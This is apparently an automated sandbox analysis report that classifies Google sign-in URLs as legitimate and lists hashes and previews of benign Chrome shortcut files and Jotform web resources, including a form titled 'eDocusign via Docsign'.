                                                        ```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The URL 'accounts.google.com' is a subdomain of 'google.com', which is the legitimate domain for Google.",    "Google is a well-known brand with a strong online presence.",    "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.",    "The input fields 'Email or phone' are consistent with Google's account login pages."  ],  "riskscore": 1}
                                                        URL: accounts.google.com
                                                                    Brands: Google
                                                                    Input Fields: Email or phone
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "to continue to Sheets",
                                                          "prominent_button_name": "Next",
                                                          "text_input_field_labels": [
                                                            "Email or phone"
                                                          ],
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Google"
                                                          ]
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The URL 'accounts.google.com' is a subdomain of 'google.com', which is the legitimate domain for Google.",    "Google is a well-known brand with a strong online presence.",    "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.",    "The input fields 'Email or phone' are typical for a Google account login page."  ],  "riskscore": 1}
                                                        URL: accounts.google.com
                                                                    Brands: Google
                                                                    Input Fields: Email or phone
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "to continue to Sheets",
                                                          "prominent_button_name": "Next",
                                                          "text_input_field_labels": [
                                                            "Email or phone"
                                                          ],
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Google"
                                                          ]
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The URL 'accounts.google.com' is a subdomain of 'google.com', which is the legitimate domain for Google.",    "Google is a well-known brand with a strong online presence.",    "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.",    "The input fields 'Email or phone' are typical for a Google account login page."  ],  "riskscore": 1}
                                                        URL: accounts.google.com
                                                                    Brands: Google
                                                                    Input Fields: Email or phone
                                                        URL: https://google.com Model: Joe Sandbox AI
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": false,
                                                            "ip_in_url": false,
                                                            "long_subdomain": false,
                                                            "malicious_keywords": false,
                                                            "encoded_characters": false,
                                                            "redirection": false,
                                                            "contains_email_address": false,
                                                            "known_domain": true,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": false
                                                        }
                                                        URL: https://google.com
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:51:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2673
                                                        Entropy (8bit):3.977146417567251
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A3D1D3CB5F7B2B606B0F858EECF80731
                                                        SHA1:1F91281CFA7924AA966B38B98ECF451DB09F055D
                                                        SHA-256:589C7757586DF8B5469C410AA2C604389F6B5989DA0FE1568F15CFC2B1F93081
                                                        SHA-512:41964DAE86DB4A890C7D5D01F259D064F5DEFC21897B70CEB040AC6A9DE425C63447AEBD6A4CD748331D53AADDC184ABAF19DFF9B30508C9CD57EA81F9E36CDA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,.....7xk.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsYn............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:51:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2675
                                                        Entropy (8bit):3.991758414316758
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:5C67852C2176216D16F335B85D6695E3
                                                        SHA1:254FC2C01CBFAF8509E81B59FC9421362987FD0A
                                                        SHA-256:770A49C3947D9762B7F255F1CA3D36C50148DEC281AAE094F6D47A6A08148653
                                                        SHA-512:1F5303703BEE9883D2C5E5D8ECE850FA3FD6FEA393DF67506D811115BD24E82E5AFE141666AC6C1FED6FFEC8636BED48BBE43B2518671AD2A5F0EB677AB4F5FD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,....J.ek.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsYn............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2689
                                                        Entropy (8bit):4.004602556772487
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:256F5E7D7BA0B54D3E21C0FFF3E0EA4B
                                                        SHA1:AC96DA7E181785FD5B9128E9089F6EADF0EB2C85
                                                        SHA-256:3D81034F2FA2B103786F33F7FB4914C2F043F0CE4C4C8CB1EAF816274EC279AB
                                                        SHA-512:697BA7C6FB4DA699136E27F49622D860B3EA5510980070D22A0D16B6DF8EA913E6FDC9A78DB90D759453621D3A797C04122C30D81D0012FD2B83D76310D4EF7D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:51:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):3.992479761653192
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:5EF502B72FF8FCDFDD60FFC29DF1E14F
                                                        SHA1:6EE1AECBE774C11F6EBFDAA7DDDF6EF96A877655
                                                        SHA-256:67CA1F13CE9B1C214A0432938A2C167C13CE14A86030609F7EF2AC03846BF8A5
                                                        SHA-512:2E0B7F4C8E916513A56E7D6E939F54DC703D2AB69CE14910728EEB988CA7F4ACF3CDFF7C586F15317C525A524D8F5A03D7854B80F63BA7AC13DE09E20CF66E54
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,.....]]k.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsYn............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:51:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):3.9792587375254524
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8EDC2E1D0BA033AC4CC21DE9B2128537
                                                        SHA1:33ABFA4143254B6A5D222EA9B6DD079D6F206679
                                                        SHA-256:3FAB36A1B6F3CE78F3CE66D1204862CF0C1DC807117C87256A2DF5A7242BB361
                                                        SHA-512:588136AC3C35846B33B4676FB8E2B7C86E1D0D904A0E7AEFC4B86F15F6DF58D46794514628114FCA174C860FC8CC3AC117F9F3EE38F2EFA14387496B4D9E06BC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,.....!pk.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsYn............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:51:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2679
                                                        Entropy (8bit):3.9899446312643234
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:31BE8E9E88F1377B11EB6904C7F8686D
                                                        SHA1:FC2C625AB446D2ED53ECE21401264C6A6F227292
                                                        SHA-256:114BE6F7D52C8FF526172A36B401F6D937E7A1A3A1D1F608CC1E3CDAB48B40B1
                                                        SHA-512:62525AFFF7E4E52132CD28A9DDF6C0A20983E8BF380BB8DF19052C2615DA69D0FDBC3A3C4E9A20144BD6F4503B91CEACFA20B2DBEB3A647498CA245CBDEDA190
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,...._.Qk.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsYb.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsYl.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsYl.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsYl............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsYn............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 103152, version 3.1245
                                                        Category:downloaded
                                                        Size (bytes):103152
                                                        Entropy (8bit):7.997761629652943
                                                        Encrypted:true
                                                        SSDEEP:
                                                        MD5:5891E05821CBF2402B6DD3F4A84CFE12
                                                        SHA1:43371FC7DD74393CB3F1DE7F500164B4156A7A50
                                                        SHA-256:F536BAE011685CDEB84A3EC10450FD024D62536949D870582F4651CD47404067
                                                        SHA-512:FD7CEA275466038869DF18A833A015877AC7F8F88F678E35D75BE55A0395E73114CCE57571E493318BAD3003E97C43117FF50F0AE6893223E8457C1C9A0654EF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Regular.woff2
                                                        Preview:wOF2.....................................................x.`?STATH..............6.$..J..P.. ..l......[&C...o..f................I..._..L..8.J...@.a.....V..{..s...._.-....Z.....................?Q.......>...:I...H..9n.....A.u..M1......F.....i.C...I...K.(.Vl.N.j=3.g.^...!Z..mX..u.:..r,m...}4)f.'.a.........K..8@......b.........:......{J.`;....v...d...b.[.M.-.>.g...:D....L33..u.....%N..c.D.&5.../OM.....c......*.?...t[..l<&|)."...T....h...5..V...o....&v1..|....zN.C..I..%..X..u..1D...c..J.....V.]w].x_.`&..^.Y[.............'..*...C.r'..O}..x.8{...VU.D.K.#..^..B-z-Q+.F.u....(.ux....GD.o[E..n.s....D..T...b5U...#..[O}.h@dc_.w..#..XT...!...b...{uN..oj...u...z...Mc.....<..IG..:w..(.......2e.R......rm%..B=.[D.H....w....s.@...[K....J.:-.OdHW*.2..L....{.jWg.|.LGkH6z........1f...3,..w.Z...J}*..L.s.=...-(.T..<..Q.....e...I.so..F.L.....U|.g...R.....[m..9..W...m....`.#*.....T...]ye..&.].;...N.......o..5..?.mc.@\.2.......U0..m_.yG.....Z.d....e.SA......J.w=.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (5642)
                                                        Category:downloaded
                                                        Size (bytes):19123
                                                        Entropy (8bit):5.081720190141128
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:0C1F0717C072A901A80984FC72E24078
                                                        SHA1:F6D086EB85A40E0AF5347C47A40FB01F83F386FC
                                                        SHA-256:B7F5B40B97F8EFF6576AD255CFF6E7A064B0DBEDDB4223C74F2B8EDFC15ABB32
                                                        SHA-512:203C72862818A5240E47C8BC51A6A02D4BBD0839DC5D3EDC348BFA4EAB5BCFE1DA3C3A50B41CFC3793406E70B221165D68F5D950001F25EE6521D89056CD2036
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://form.jotform.com/243186396374063
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html lang="en" class="supernova "><head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<link rel="alternate" type="application/json+oembed" href="https://www.jotform.com/oembed/?format=json&amp;url=https%3A%2F%2Fform.jotform.com%2F243186396374063" title="oEmbed Form">.<link rel="alternate" type="text/xml+oembed" href="https://www.jotform.com/oembed/?format=xml&amp;url=https%3A%2F%2Fform.jotform.com%2F243186396374063" title="oEmbed Form">.<meta property="og:title" content="eDocusign via Docsign" >.<meta property="og:url" content="https://form.jotform.com/243186396374063" >.<meta property="og:description" content="Please click the link to complete this form." >.<meta name="slack-app-id" content="AHNMASS8M">.<meta property="og:image" content="https://cdn.jotfor.ms/assets/img/landing/opengraph.png" />.<link rel="shortcut icon" href="https://cdn.jotfor.ms/assets/img/favicons/
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):2402
                                                        Entropy (8bit):4.848165491992826
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B1C9F2907832D28E4146E9BD0EA94FE5
                                                        SHA1:163CC7729917A90E1674A1F252C80B147A5ED051
                                                        SHA-256:C8DCA6EAEF71BEE988E6332CC042BAE4ECECBD4F284E8DDBFE1A1FD2C9EBB709
                                                        SHA-512:6A69062E50A8837EF034E2DC6AB5C8527230A2CD64578F4B83AE09E8F0F7C2E4A5B46B2BE6CCF092A7E659E9E7183B8384F06DE1B532933F3ECF7F599A63673E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn.jotfor.ms/fonts/?family=Inter&display=swap
                                                        Preview:@font-face {. font-family: "Inter";. src: url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Medium.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Medium.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 500;.}..@font-face {. font-family: "Inter";. src: url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Black.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Black.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 900;.}..@font-face {. font-family: "Inter";. src: url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Regular.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Regular.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 400;.}..@font-face {. font-family: "Inter";. src: url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-ExtraLight.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/inter/fonts/Inter-ExtraLight.woff) format("
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:dropped
                                                        Size (bytes):89501
                                                        Entropy (8bit):5.289893677458563
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (6048)
                                                        Category:downloaded
                                                        Size (bytes):662329
                                                        Entropy (8bit):5.34679633005059
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B929172711C39CB9A534AD4CB29C3B19
                                                        SHA1:9FF4499C95ADA674FB41922A3B19BEDBB1C3B029
                                                        SHA-256:699C7A25BF75CC8F2F2F51AC39213F3FB4246675E5C574905A32CCEA21C82641
                                                        SHA-512:27F7547B0794A7BFCA060A1D04CC4E180DF1548D4890E00E87298A00C9956AF26A9F11B49FDCCF748CFD55EA3C3CB93C38C289B286E774B9A6D6AFE547C00BBC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn03.jotfor.ms/static/jotform.forms.js?v=3.3.58633
                                                        Preview:if(window.console===undefined){if(!window.console||!console.firebug){(function(m,i){window.console={};var e=function(){};while(i--){window.console[m[i]]=e;}})('log debug info warn error assert dir dirxml trace group groupEnd time timeEnd profile profileEnd count'.split(' '),16);}.window.console.error=function(e){throw(e);};}.window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){window.setTimeout(callback,1000/60);};})();if(window.Prototype===undefined){throw("Error:prototype.js is required by protoplus.js. Go to prototypejs.org and download lates version.");}.Protoplus={Version:"0.9.9",exec:function(code){return eval(code);},REFIDCOUNT:100,references:{},getIEVersion:function(){var rv=-1;if(navigator.appName=='Microsoft Internet Explorer').{var ua=navigator.userAgent;var re=new RegExp("MSIE ([0-9]{1,}[\\.0-9]{0,})");if(
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (397)
                                                        Category:downloaded
                                                        Size (bytes):1609
                                                        Entropy (8bit):5.270804119803876
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:339A08D7CD96B998C91696953A899A3D
                                                        SHA1:0BE00BD13F4171F81BC771C1AD4A63EA13CD4BD1
                                                        SHA-256:EB76AB656EFAA44076348F8DD959E0E464A03A5D296D5016B2E7FFE9EEB96557
                                                        SHA-512:44EDD8CB2578792FD385C0F5BC3B360FC25EA37A14CB5B9E34A80F3891339CE214794845637B00056B2B3B53F5009D99755B27817743881AD78891D0D962DBD2
                                                        Malicious:false
                                                        Reputation:unknown
